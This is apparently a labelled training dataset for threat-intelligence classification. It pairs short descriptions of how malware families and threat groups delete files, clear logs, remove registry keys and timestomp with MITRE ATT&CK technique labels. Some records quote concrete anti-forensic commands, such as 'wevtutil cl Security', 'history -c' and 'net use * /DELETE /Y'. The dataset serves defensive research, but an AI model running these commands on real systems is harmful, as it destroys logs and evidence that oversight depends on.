{"text1":"Maze has used the \u201cWow64RevertWow64FsRedirection\u201d function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.","labels":"['T1070']"}
|
|
{"text1":"Metamorfo has a command to delete a Registry key it uses, \"\\Software\\Microsoft\\Internet Explorer\\notes\".","labels":"['T1070']"}
|
|
{"text1":"Misdat is capable of deleting Registry keys used for persistence.","labels":"['T1070', 'T1070.009']"}
|
|
{"text1":"Neoichor can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Privacy` Registry key.","labels":"['T1070']"}
|
|
{"text1":"Orz can overwrite Registry settings to reduce its visibility on the victim.","labels":"['T1070']"}
|
|
{"text1":"Pillowmint can uninstall the malicious service from an infected machine.","labels":"['T1070', 'T1070.009']"}
|
|
{"text1":"RTM has the ability to remove Registry entries that it created during execution.","labels":"['T1070']"}
|
|
{"text1":"Rising Sun can clear a memory block in the process by overwriting it with junk bytes.","labels":"['T1070']"}
|
|
{"text1":"S-Type has deleted accounts it has created.","labels":"['T1070']"}
|
|
{"text1":"SDBbot has the ability to clean up and remove data structures from a compromised host.","labels":"['T1070']"}
|
|
{"text1":"SILENTTRINITY can remove artifacts from the compromised host, including created Registry keys.","labels":"['T1070']"}
|
|
{"text1":"ShadowPad has deleted arbitrary Registry values.","labels":"['T1070']"}
|
|
{"text1":"Sibot will delete an associated registry key if a certain server response is received.","labels":"['T1070']"}
|
|
{"text1":"UNC2452 removed evidence of email export requests using \"Remove-MailboxExportRequest\". They temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.","labels":"['T1070']"}
|
|
{"text1":"njRAT is capable of manipulating and deleting registry keys.","labels":"['T1070']"}
|
|
{"text1":"APT28 has cleared event logs, including by using the commands \"wevtutil cl System\" and \"wevtutil cl Security\".","labels":"['T1070.001']"}
|
|
{"text1":"APT32 has cleared select event log entries.","labels":"['T1070.001']"}
|
|
{"text1":"APT38 clears Windows Event logs and Sysmon logs from the system.","labels":"['T1070.001']"}
|
|
{"text1":"APT41 attempted to remove evidence of some of its activity by clearing Windows security and system events.","labels":"['T1070.001']"}
|
|
{"text1":"Dragonfly 2.0 cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.","labels":"['T1070.001']"}
|
|
{"text1":"Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.","labels":"['T1070.001']"}
|
|
{"text1":"During Operation Wocao, the threat actors deleted all Windows system and security event logs using `\/Q \/c wevtutil cl system` and `\/Q \/c wevtutil cl security`.","labels":"['T1070.001']"}
|
|
{"text1":"FIN5 has cleared event logs from victims.","labels":"['T1070.001']"}
|
|
{"text1":"FIN8 has cleared logs during post compromise cleanup activities.","labels":"['T1070.001']"}
|
|
{"text1":"FinFisher clears the system event logs using the \"OpenEventLog\/ClearEventLog\" APIs.","labels":"['T1070.001']"}
|
|
{"text1":"HermeticWizard has the ability to use `wevtutil cl system` to clear event logs.","labels":"['T1070.001']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can clear all system event logs.","labels":"['T1070.001']"}
|
|
{"text1":"Indrik Spider has used Cobalt Strike to empty log files.","labels":"['T1070.001']"}
|
|
{"text1":"KillDisk deletes Application, Security, Setup, and System Windows Event Logs.","labels":"['T1070.001']"}
|
|
{"text1":"Lucifer can clear and remove event logs.","labels":"['T1070.001']"}
|
|
{"text1":"Meteor can use Wevtutil to remove Security, System and Application Event Viewer logs.","labels":"['T1070.001']"}
|
|
{"text1":"NotPetya uses \"wevtutil\" to clear the Windows event logs.","labels":"['T1070.001']"}
|
|
{"text1":"Olympic Destroyer will attempt to clear the System and Security event logs using \"wevtutil\".","labels":"['T1070.001']"}
|
|
{"text1":"Operation Wocao has deleted Windows Event Logs to hinder forensic investigation.","labels":"['T1070.001']"}
|
|
{"text1":"Pupy has a module to clear event logs with PowerShell.","labels":"['T1070.001']"}
|
|
{"text1":"RunningRAT contains code to clear event logs.","labels":"['T1070.001']"}
|
|
{"text1":"The BlackEnergy component KillDisk is capable of deleting Windows Event Logs.","labels":"['T1070.001']"}
|
|
{"text1":"ZxShell has a command to clear system event logs.","labels":"['T1070.001']"}
|
|
{"text1":"MacMa can clear possible malware traces such as application logs.","labels":"['T1070.002']"}
|
|
{"text1":"Proton removes logs from \"\/var\/logs\" and \"\/Library\/logs\".","labels":"['T1070.002']"}
|
|
{"text1":"TeamTNT has removed system logs from \"\/var\/log\/syslog\".","labels":"['T1070.002']"}
|
|
{"text1":"APT41 attempted to remove evidence of some of its activity by deleting Bash histories.","labels":"['T1070.003']"}
|
|
{"text1":"Hildegard has used history -c to clear script shell logs.","labels":"['T1070.003']"}
|
|
{"text1":"Kobalos can remove all command history on compromised hosts.","labels":"['T1070.003']"}
|
|
{"text1":"Lazarus Group has routinely deleted log files on a compromised router, including automatic log deletion through the use of the logrotate utility.","labels":"['T1070.003']"}
|
|
{"text1":"Magic Hound has removed mailbox export requests from compromised Exchange servers.","labels":"['T1070.003']"}
|
|
{"text1":"TeamTNT has cleared command history with \"history -c\".","labels":"['T1070.003']"}
|
|
{"text1":"A menuPass macro deletes files after it has decoded and decompressed them.","labels":"['T1070.004']"}
|
|
{"text1":"ADVSTORESHELL can delete files and directories.","labels":"['T1070.004']"}
|
|
{"text1":"APT18 actors deleted tools and batch files from victim systems.","labels":"['T1070.004']"}
|
|
{"text1":"APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.","labels":"['T1070.004']"}
|
|
{"text1":"APT29 routinely removed their tools, including custom backdoors, once remote access was achieved. APT29 has also used SDelete to remove artifacts from victims.","labels":"['T1070.004']"}
|
|
{"text1":"APT3 has a tool that can delete files.","labels":"['T1070.004']"}
|
|
{"text1":"APT32's macOS backdoor can receive a \u201cdelete\u201d command.","labels":"['T1070.004']"}
|
|
{"text1":"APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.","labels":"['T1070.004']"}
|
|
{"text1":"APT39 has used malware to delete files after they are deployed on a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"After encrypting its own log files, the log encryption module in Prikormka deletes the original, unencrypted files from the host.","labels":"['T1070.004']"}
|
|
{"text1":"Anchor can self delete its dropper after the malware is successfully deployed.","labels":"['T1070.004']"}
|
|
{"text1":"AppleJeus has deleted the MSI file after installation.","labels":"['T1070.004']"}
|
|
{"text1":"Aquatic Panda has deleted malicious executables from compromised machines.","labels":"['T1070.004']"}
|
|
{"text1":"Aria-body has the ability to delete files and directories on compromised hosts.","labels":"['T1070.004']"}
|
|
{"text1":"AuditCred can delete files from the system.","labels":"['T1070.004']"}
|
|
{"text1":"Azorult can delete files from victim machines.","labels":"['T1070.004']"}
|
|
{"text1":"BBSRAT can delete files and directories.","labels":"['T1070.004']"}
|
|
{"text1":"BLINDINGCAN has deleted itself and associated artifacts from victim machines.","labels":"['T1070.004']"}
|
|
{"text1":"BLUELIGHT can uninstall itself.","labels":"['T1070.004']"}
|
|
{"text1":"BabyShark has cleaned up all files associated with the secondary payload execution.","labels":"['T1070.004']"}
|
|
{"text1":"Backdoor.Oldrea contains a cleanup module that removes traces of itself from the victim.","labels":"['T1070.004']"}
|
|
{"text1":"Bandook has a command to delete a file.","labels":"['T1070.004']"}
|
|
{"text1":"Bankshot marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.","labels":"['T1070.004']"}
|
|
{"text1":"Bumblebee can uninstall its loader through the use of a `Sdl` command.","labels":"['T1070.004']"}
|
|
{"text1":"CARROTBAT has the ability to delete downloaded files from a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"CSPY Downloader has the ability to self delete.","labels":"['T1070.004']"}
|
|
{"text1":"Calisto has the capability to use \"rm -rf\" to remove folders and files from the victim's machine.","labels":"['T1070.004']"}
|
|
{"text1":"Cardinal RAT can uninstall itself, including deleting its executable.","labels":"['T1070.004']"}
|
|
{"text1":"CharmPower can delete created files from a compromised system.","labels":"['T1070.004']"}
|
|
{"text1":"Chimera has performed file deletion to evade detection.","labels":"['T1070.004']"}
|
|
{"text1":"Crimson has the ability to delete files from a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"Cuba can use the command \"cmd.exe \/c del\" to delete its artifacts from the system.","labels":"['T1070.004']"}
|
|
{"text1":"DanBot can delete its configuration file after installation.","labels":"['T1070.004']"}
|
|
{"text1":"DarkWatchman has been observed deleting its original launcher after installation.","labels":"['T1070.004']"}
|
|
{"text1":"Dragonfly 2.0 deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.","labels":"['T1070.004']"}
|
|
{"text1":"Dragonfly has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.","labels":"['T1070.004']"}
|
|
{"text1":"Drovorub can delete specific files from a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"Dtrack can remove its persistence and delete itself.","labels":"['T1070.004']"}
|
|
{"text1":"During Operation Honeybee, the threat actors used batch files that reduced their fingerprint on a compromised system by deleting malware-related files.","labels":"['T1070.004']"}
|
|
{"text1":"During Operation Wocao, the threat actors consistently removed traces of their activity by first overwriting a file using `\/c cd \/d c:\\windows\\temp\\ & copy \\\\<IP ADDRESS>\\c$\\windows\\system32\\devmgr.dll \\\\<IP ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1 \/y` and then deleting the overwritten file using `\/c cd \/d c:\\windows\\temp\\ & del \\\\<IP ADDRESS>\\c$\\windows\\temp\\LMAKSW.ps1`.","labels":"['T1070.004']"}
|
|
{"text1":"DustySky can delete files it creates from the infected system.","labels":"['T1070.004']"}
|
|
{"text1":"ECCENTRICBANDWAGON can delete log files generated from the malware stored at \"C:\\windows\\temp\\tmp0207\".","labels":"['T1070.004']"}
|
|
{"text1":"EvilBunny has deleted the initial dropper after running through the environment checks.","labels":"['T1070.004']"}
|
|
{"text1":"Evilnum has deleted files used during infection.","labels":"['T1070.004']"}
|
|
{"text1":"Exaramel for Linux can uninstall its persistence mechanism and delete its configuration file.","labels":"['T1070.004']"}
|
|
{"text1":"FELIXROOT deletes the .LNK file from the startup directory as well as the dropper components.","labels":"['T1070.004']"}
|
|
{"text1":"FIN10 has used batch scripts and scheduled tasks to delete critical system files.","labels":"['T1070.004']"}
|
|
{"text1":"FIN5 uses SDelete to clean up the environment and attempt to prevent detection.","labels":"['T1070.004']"}
|
|
{"text1":"FIN6 has removed files from victim machines.","labels":"['T1070.004']"}
|
|
{"text1":"FIN8 has deleted tmp and prefetch files during post compromise cleanup activities.","labels":"['T1070.004']"}
|
|
{"text1":"FatDuke can secure delete its DLL.","labels":"['T1070.004']"}
|
|
{"text1":"Ferocious can delete files from a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"FlawedAmmyy can execute batch scripts to delete files.","labels":"['T1070.004']"}
|
|
{"text1":"FruitFly will delete files on the system.","labels":"['T1070.004']"}
|
|
{"text1":"Fysbis has the ability to delete files.","labels":"['T1070.004']"}
|
|
{"text1":"Gamaredon Group tools can delete files used during an operation.","labels":"['T1070.004']"}
|
|
{"text1":"Gazer has commands to delete files and persistence mechanisms from the victim.","labels":"['T1070.004']"}
|
|
{"text1":"Gelsemium can delete its dropper component from the targeted system.","labels":"['T1070.004']"}
|
|
{"text1":"Gold Dragon deletes one of its files, 2.hwp, from the endpoint after establishing persistence.","labels":"['T1070.004']"}
|
|
{"text1":"Green Lambert can delete the original executable after initial installation in addition to unused functions.","labels":"['T1070.004']"}
|
|
{"text1":"GreyEnergy can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API.","labels":"['T1070.004']"}
|
|
{"text1":"GrimAgent can delete old binaries on a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"HALFBAKED can delete a specified file.","labels":"['T1070.004']"}
|
|
{"text1":"HAWKBALL has the ability to delete files.","labels":"['T1070.004']"}
|
|
{"text1":"Hancitor has deleted files using the VBA \"kill\" function.","labels":"['T1070.004']"}
|
|
{"text1":"HermeticWiper has the ability to overwrite its own file with random bytes.","labels":"['T1070.004']"}
|
|
{"text1":"Hi-Zor deletes its RAT installer file as it executes its DLL payload file.","labels":"['T1070.004']"}
|
|
{"text1":"Hildegard has deleted scripts after execution.","labels":"['T1070.004']"}
|
|
{"text1":"HotCroissant has the ability to clean up installed files, delete files, and delete itself from the victim\u2019s machine.","labels":"['T1070.004']"}
|
|
{"text1":"Hydraq creates a backdoor through which remote attackers can delete files.","labels":"['T1070.004']"}
|
|
{"text1":"HyperBro has the ability to delete a specified file.","labels":"['T1070.004']"}
|
|
{"text1":"IceApple can delete files and directories from targeted systems.","labels":"['T1070.004']"}
|
|
{"text1":"Imminent Monitor has deleted files related to its dynamic debugger feature.","labels":"['T1070.004']"}
|
|
{"text1":"InnaputRAT has a command to delete files.","labels":"['T1070.004']"}
|
|
{"text1":"InvisiMole has deleted files and directories including XML and files successfully uploaded to C2 servers.","labels":"['T1070.004']"}
|
|
{"text1":"Ixeshe has a command to delete a file from the machine.","labels":"['T1070.004']"}
|
|
{"text1":"JPIN's installer\/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.","labels":"['T1070.004']"}
|
|
{"text1":"KONNI can delete files.","labels":"['T1070.004']"}
|
|
{"text1":"Kevin can delete files created on the victim's machine.","labels":"['T1070.004']"}
|
|
{"text1":"KillDisk has the ability to quit and delete itself.","labels":"['T1070.004']"}
|
|
{"text1":"Kimsuky has deleted the exfiltrated data on disk after transmission. Kimsuky has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk.","labels":"['T1070.004']"}
|
|
{"text1":"LightNeuron has a function to delete files.","labels":"['T1070.004']"}
|
|
{"text1":"Linfo creates a backdoor through which remote attackers can delete files.","labels":"['T1070.004']"}
|
|
{"text1":"LiteDuke can securely delete files by first writing random data to the file.","labels":"['T1070.004']"}
|
|
{"text1":"LockerGoga has been observed deleting its original launcher after execution.","labels":"['T1070.004']"}
|
|
{"text1":"LookBack removes itself after execution and can delete files on the system.","labels":"['T1070.004']"}
|
|
{"text1":"MURKYTOP has the capability to delete local files.","labels":"['T1070.004']"}
|
|
{"text1":"MacMa can delete itself from the compromised computer.","labels":"['T1070.004']"}
|
|
{"text1":"MacSpy deletes any temporary files it creates.","labels":"['T1070.004']"}
|
|
{"text1":"Metamorfo has deleted itself from the system after execution.","labels":"['T1070.004']"}
|
|
{"text1":"Meteor will delete the folder containing malicious scripts if it detects the hostname as `PIS-APP`, `PIS-MOB`, `WSUSPROXY`, or `PIS-DB`.","labels":"['T1070.004']"}
|
|
{"text1":"Milan can delete files via `C:\\Windows\\system32\\cmd.exe \/c ping 1.1.1.1 -n 1 -w 3000 > Nul & rmdir \/s \/q`.","labels":"['T1070.004']"}
|
|
{"text1":"Misdat is capable of deleting the backdoor file.","labels":"['T1070.004']"}
|
|
{"text1":"MoonWind can delete itself or specified files.","labels":"['T1070.004']"}
|
|
{"text1":"Mosquito deletes files using DeleteFileW API call.","labels":"['T1070.004']"}
|
|
{"text1":"Mustang Panda will delete their tools and files, and kill processes after their objectives are reached.","labels":"['T1070.004']"}
|
|
{"text1":"NOKKI can delete files to cover tracks.","labels":"['T1070.004']"}
|
|
{"text1":"Nebulae has the ability to delete files and directories.","labels":"['T1070.004']"}
|
|
{"text1":"OSX_OCEANLOTUS.D has a command to delete a file from the system. OSX_OCEANLOTUS.D deletes the app bundle and dropper after execution.","labels":"['T1070.004']"}
|
|
{"text1":"OceanSalt can delete files from the system.","labels":"['T1070.004']"}
|
|
{"text1":"OilRig has deleted files associated with their payload after execution.","labels":"['T1070.004']"}
|
|
{"text1":"Okrum's backdoor deletes files after they have been successfully uploaded to C2 servers.","labels":"['T1070.004']"}
|
|
{"text1":"Once a file is uploaded, Machete will delete it from the machine.","labels":"['T1070.004']"}
|
|
{"text1":"OutSteel can delete itself following the successful execution of a follow-on payload.","labels":"['T1070.004']"}
|
|
{"text1":"P.A.S. Webshell can delete scripts from a subdirectory of \/tmp after they are run.","labels":"['T1070.004']"}
|
|
{"text1":"PLEAD has the ability to delete files on the compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"PUNCHBUGGY can delete files written to disk.","labels":"['T1070.004']"}
|
|
{"text1":"Pasam creates a backdoor through which remote attackers can delete files.","labels":"['T1070.004']"}
|
|
{"text1":"Pay2Key can remove its log file from disk.","labels":"['T1070.004']"}
|
|
{"text1":"PcShare has deleted its files and components from a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"Penquin can delete downloaded executables after running them.","labels":"['T1070.004']"}
|
|
{"text1":"PoetRAT has the ability to overwrite scripts and delete itself if a sandbox environment is detected.","labels":"['T1070.004']"}
|
|
{"text1":"Pony has used scripts to delete itself after execution.","labels":"['T1070.004']"}
|
|
{"text1":"ProLock can remove files containing its payload after they are executed.","labels":"['T1070.004']"}
|
|
{"text1":"Pteranodon can delete files that may interfere with it executing. It also can delete temporary files and itself after the initial script executes.","labels":"['T1070.004']"}
|
|
{"text1":"PyDCrypt will remove all created artifacts such as dropped executables.","labels":"['T1070.004']"}
|
|
{"text1":"Pysa has deleted batch files after execution.","labels":"['T1070.004']"}
|
|
{"text1":"QUADAGENT has a command to delete its Registry key and scheduled task.","labels":"['T1070.004']"}
|
|
{"text1":"QakBot can delete folders and files including overwriting its executable with legitimate programs.","labels":"['T1070.004']"}
|
|
{"text1":"RCSession can remove files from a targeted system.","labels":"['T1070.004']"}
|
|
{"text1":"RDAT can issue SOAP requests to delete already processed C2 emails. RDAT can also delete itself from the infected system.","labels":"['T1070.004']"}
|
|
{"text1":"RDFSNIFFER has the capability of deleting local files.","labels":"['T1070.004']"}
|
|
{"text1":"REvil can mark its binary code for deletion after reboot.","labels":"['T1070.004']"}
|
|
{"text1":"ROKRAT can request to delete files.","labels":"['T1070.004']"}
|
|
{"text1":"RTM can delete all files created during its execution.","labels":"['T1070.004']"}
|
|
{"text1":"RainyDay has the ability to uninstall itself by deleting its service and files.","labels":"['T1070.004']"}
|
|
{"text1":"Reaver deletes the original dropped file from the victim.","labels":"['T1070.004']"}
|
|
{"text1":"Recent versions of Cherry Picker delete files and registry keys created by the malware.","labels":"['T1070.004']"}
|
|
{"text1":"RedLeaves can delete specified files.","labels":"['T1070.004']"}
|
|
{"text1":"Rising Sun can delete files and artifacts it creates.","labels":"['T1070.004']"}
|
|
{"text1":"Rocke has deleted files on infected machines.","labels":"['T1070.004']"}
|
|
{"text1":"RunningRAT contains code to delete files from the victim\u2019s machine.","labels":"['T1070.004']"}
|
|
{"text1":"S-Type has deleted files it has created on a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"SDBbot has the ability to delete files from a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"SILENTTRINITY can remove files from the compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"SLOTHFULMEDIA has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.","labels":"['T1070.004']"}
|
|
{"text1":"SQLRat has been observed deleting scripts once used.","labels":"['T1070.004']"}
|
|
{"text1":"Saint Bot can run a batch script named `del.bat` to remove any Saint Bot payload-linked files from a compromised system if anti-analysis or locale checks fail.","labels":"['T1070.004']"}
|
|
{"text1":"SamSam has been seen deleting its own files and payloads to make analysis of the attack more difficult.","labels":"['T1070.004']"}
|
|
{"text1":"Sandworm Team has used backdoors that can delete files used in an attack from an infected system.","labels":"['T1070.004']"}
|
|
{"text1":"SeaDuke can securely delete files, including deleting itself from the victim.","labels":"['T1070.004']"}
|
|
{"text1":"Seasalt has a command to delete a specified file.","labels":"['T1070.004']"}
|
|
{"text1":"ServHelper has a module to delete itself from the infected machine.","labels":"['T1070.004']"}
|
|
{"text1":"Shark can delete files downloaded to the compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"ShimRat can uninstall itself from compromised hosts, as well as create and modify directories, and delete, move, copy, and rename files.","labels":"['T1070.004']"}
|
|
{"text1":"Silence has deleted artifacts, including scheduled tasks, files communicated from the C2, and other logs.","labels":"['T1070.004']"}
|
|
{"text1":"SombRAT has the ability to run \"cancel\" or \"closeanddeletestorage\" to remove all files from storage and delete the storage temp file on a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"Some Sakula samples use cmd.exe to delete temporary files.","labels":"['T1070.004']"}
|
|
{"text1":"SpeakUp deletes files to remove evidence on the machine.","labels":"['T1070.004']"}
|
|
{"text1":"StoneDrill has been observed deleting the temporary files once they fulfill their task.","labels":"['T1070.004']"}
|
|
{"text1":"StrifeWater can self delete to cover its tracks.","labels":"['T1070.004']"}
|
|
{"text1":"Stuxnet uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files.","labels":"['T1070.004']"}
|
|
{"text1":"SysUpdate can delete its configuration file from the targeted system.","labels":"['T1070.004']"}
|
|
{"text1":"TAINTEDSCRIBE can delete files from a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"TDTESS creates then deletes log files during installation of itself as a service.","labels":"['T1070.004']"}
|
|
{"text1":"TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them.","labels":"['T1070.004']"}
|
|
{"text1":"Taidoor can use \"DeleteFileA\" to remove files from infected hosts.","labels":"['T1070.004']"}
|
|
{"text1":"TeamTNT has used a payload that removes itself after running. TeamTNT also has deleted locally staged files for collecting credentials or scan results for local IP addresses after exfiltrating them.","labels":"['T1070.004']"}
|
|
{"text1":"The BRONZE BUTLER uploader, or malware the uploader uses, issues a \"command\" to delete the RAR archives after they have been exfiltrated.","labels":"['T1070.004']"}
|
|
{"text1":"The JHUHUGIT dropper can delete itself from the victim. Another JHUHUGIT variant has the capability to delete specified files.","labels":"['T1070.004']"}
|
|
{"text1":"The Komplex trojan supports file deletion.","labels":"['T1070.004']"}
|
|
{"text1":"Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim.","labels":"['T1070.004']"}
|
|
{"text1":"Trojan.Karagany has used plugins with a self-delete capability.","labels":"['T1070.004']"}
|
|
{"text1":"Tropic Trooper has deleted dropper files on an infected system using command scripts.","labels":"['T1070.004']"}
|
|
{"text1":"UNC2452 routinely removed their tools, including custom backdoors, once remote access was achieved.","labels":"['T1070.004']"}
|
|
{"text1":"Ursnif has deleted data staged in tmp files after exfiltration.","labels":"['T1070.004']"}
|
|
{"text1":"VBShower has attempted to complicate forensic analysis by deleting all the files contained in \"%APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".","labels":"['T1070.004']"}
|
|
{"text1":"VERMIN can delete files on the victim\u2019s machine.","labels":"['T1070.004']"}
|
|
{"text1":"Volgmer can delete files and itself after infection to avoid analysis.","labels":"['T1070.004']"}
|
|
{"text1":"Wingbird deletes its payload along with the payload's parent process after it finishes copying files.","labels":"['T1070.004']"}
|
|
{"text1":"Winnti for Windows can delete the DLLs for its various components from a compromised host.","labels":"['T1070.004']"}
|
|
{"text1":"Wizard Spider has used file deletion to remove some modules and configurations from an infected host after use.","labels":"['T1070.004']"}
|
|
{"text1":"XAgentOSX contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.","labels":"['T1070.004']"}
|
|
{"text1":"Zebrocy has a command to delete files and directories.","labels":"['T1070.004']"}
|
|
{"text1":"Zeus Panda has a command to delete a file. It also can uninstall scripts and delete files to cover its tracks.","labels":"['T1070.004']"}
|
|
{"text1":"ZxShell can delete files from the system.","labels":"['T1070.004']"}
|
|
{"text1":"ccf32 can delete files and folders from compromised machines.","labels":"['T1070.004']"}
|
|
{"text1":"cmd can be used to delete files from the file system.","labels":"['T1070.004']"}
|
|
{"text1":"gh0st RAT has the capability to delete files.","labels":"['T1070.004']"}
|
|
{"text1":"pngdowner deletes content from C2 communications that was saved to the user's temporary directory.","labels":"['T1070.004']"}
|
|
{"text1":"zwShell has deleted itself after creating a service as well as deleted a temporary file when the system reboots.","labels":"['T1070.004']"}
|
|
{"text1":"InvisiMole can disconnect previously connected remote drives.","labels":"['T1070.005']"}
|
|
{"text1":"RobbinHood disconnects all network shares from the computer with the command \"net use * \/DELETE \/Y\".","labels":"['T1070.005']"}
|
|
{"text1":"The \"net use \\\\system\\share \/delete\" command can be used in Net to remove an established connection to a network share.","labels":"['T1070.005']"}
|
|
{"text1":"Threat Group-3390 has detached network shares after exfiltrating files, likely to evade detection.","labels":"['T1070.005']"}
|
|
{"text1":"3PARA RAT has a command to set certain attributes such as creation\/modification timestamps on files.","labels":"['T1070.006']"}
|
|
{"text1":"APT29 modified timestamps of backdoors to match legitimate Windows files.","labels":"['T1070.006']"}
|
|
{"text1":"APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, APT32 has used a random value to modify the timestamp of the file storing the clientID.","labels":"['T1070.006']"}
|
|
{"text1":"APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.","labels":"['T1070.006']"}
|
|
{"text1":"After creating a new service for persistence, TDTESS sets the file creation time for the service to the creation time of the victim's legitimate svchost.exe file.","labels":"['T1070.006']"}
|
|
{"text1":"Attor has manipulated the time of last access to files and registry keys after they have been created or modified.","labels":"['T1070.006']"}
|
|
{"text1":"BLINDINGCAN has modified file and directory timestamps.","labels":"['T1070.006']"}
|
|
{"text1":"Bankshot modifies the time of a file as specified by the control server.","labels":"['T1070.006']"}
|
|
{"text1":"BitPaymer can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.","labels":"['T1070.006']"}
|
|
{"text1":"China Chopper's server component can change the timestamp of files.","labels":"['T1070.006']"}
|
|
{"text1":"Cobalt Strike can timestomp any files or payloads placed on a target machine to help them blend in.","labels":"['T1070.006']"}
|
|
{"text1":"Cobalt Strike will timestomp any files or payloads placed on a target machine to help them blend in.","labels":"['T1070.006']"}
|
|
{"text1":"Cyclops Blink has the ability to use the Linux API function `utime` to change the timestamps of modified firmware update images.","labels":"['T1070.006']"}
|
|
{"text1":"EVILNUM has changed the creation date of files.","labels":"['T1070.006']"}
|
|
{"text1":"Elise performs timestomping of a CAB file it creates.","labels":"['T1070.006']"}
|
|
{"text1":"Empire can timestomp any files or payloads placed on a target machine to help them blend in.","labels":"['T1070.006']"}
|
|
{"text1":"FALLCHILL can modify file or directory timestamps.","labels":"['T1070.006']"}
|
|
{"text1":"For early Gazer versions, the compilation timestamp was faked.","labels":"['T1070.006']"}
|
|
{"text1":"Gelsemium has the ability to perform timestomping of files on targeted systems.","labels":"['T1070.006']"}
|
|
{"text1":"InvisiMole samples were timestomped by the authors by setting the PE timestamps to all zero values. InvisiMole also has a built-in command to modify file times.","labels":"['T1070.006']"}
|
|
{"text1":"Kimsuky has manipulated timestamps for creation or compilation dates to defeat anti-forensics.","labels":"['T1070.006']"}
|
|
{"text1":"Kobalos can modify timestamps of replaced files, such as \"ssh\" with the added credential stealer or \"sshd\" used to deploy Kobalos.","labels":"['T1070.006']"}
|
|
{"text1":"MacMa has the capability to create and modify file timestamps.","labels":"['T1070.006']"}
|
|
{"text1":"Many Misdat samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.","labels":"['T1070.006']"}
|
|
{"text1":"OSX_OCEANLOTUS.D can use the \"touch -t\" command to change timestamps.","labels":"['T1070.006']"}
|
|
{"text1":"OwaAuth has a command to timestomp a file or directory.","labels":"['T1070.006']"}
|
|
{"text1":"POSHSPY modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.","labels":"['T1070.006']"}
|
|
{"text1":"PowerStallion modifies the MAC times of its local log files to match that of the victim's desktop.ini file.","labels":"['T1070.006']"}
|
|
{"text1":"Psylo has a command to conduct timestomping by setting a specified file\u2019s timestamps to match those of a system file in the System32 directory.","labels":"['T1070.006']"}
|
|
{"text1":"Rocke has changed the time stamp of certain files.","labels":"['T1070.006']"}
|
|
{"text1":"SEASHARPEE can timestomp files on victims using a Web shell.","labels":"['T1070.006']"}
|
|
{"text1":"Several Lazarus Group malware families use timestomping, including modifying the last write timestamp of a specified Registry key to a random date, as well as copying the timestamp for legitimate .exe files (such as calc.exe or mspaint.exe) to its dropped files.","labels":"['T1070.006']"}
|
|
{"text1":"Stuxnet extracts and writes driver files that match the times of other legitimate files.","labels":"['T1070.006']"}
|
|
{"text1":"TAINTEDSCRIBE can change the timestamp of specified filenames.","labels":"['T1070.006']"}
|
|
{"text1":"TEMP.Veles used timestomping to modify the $STANDARD_INFORMATION attribute on tools.","labels":"['T1070.006']"}
|
|
{"text1":"The Derusbi malware supports timestomping.","labels":"['T1070.006']"}
|
|
{"text1":"UNC2452 modified timestamps of backdoors to match legitimate Windows files.","labels":"['T1070.006']"}
|
|
{"text1":"Winnti for Windows can set the timestamps for its worker and service components to match that of cmd.exe.","labels":"['T1070.006']"}
|
|
{"text1":"APT29 removed evidence of email export requests using \"Remove-MailboxExportRequest\".","labels":"['T1070.008']"}
|
|
{"text1":"MCMD has the ability to remove set Registry Keys, including those used for persistence.","labels":"['T1070.009']"}
|
|
{"text1":"RTM has the ability to remove Registry entries that it created for persistence.","labels":"['T1070.009']"}
|
|
{"text1":"SUNBURST removed IFEO registry values to clean up traces of persistence.","labels":"['T1070.009']"}
|
|
{"text1":"njRAT is capable of manipulating and deleting registry keys, including those used for persistence.","labels":"['T1070.009']"}
|
|
{"text1":"APT34 malware often uses HTTP and DNS for C2. The group has also used the Plink utility and other tools to create tunnels to C2 servers.","labels":"['T1071']"}
|
|
{"text1":"Adversaries can also use NETEAGLE to establish an RDP connection with a controller over TCP\/7519.","labels":"['T1071']"}
|
|
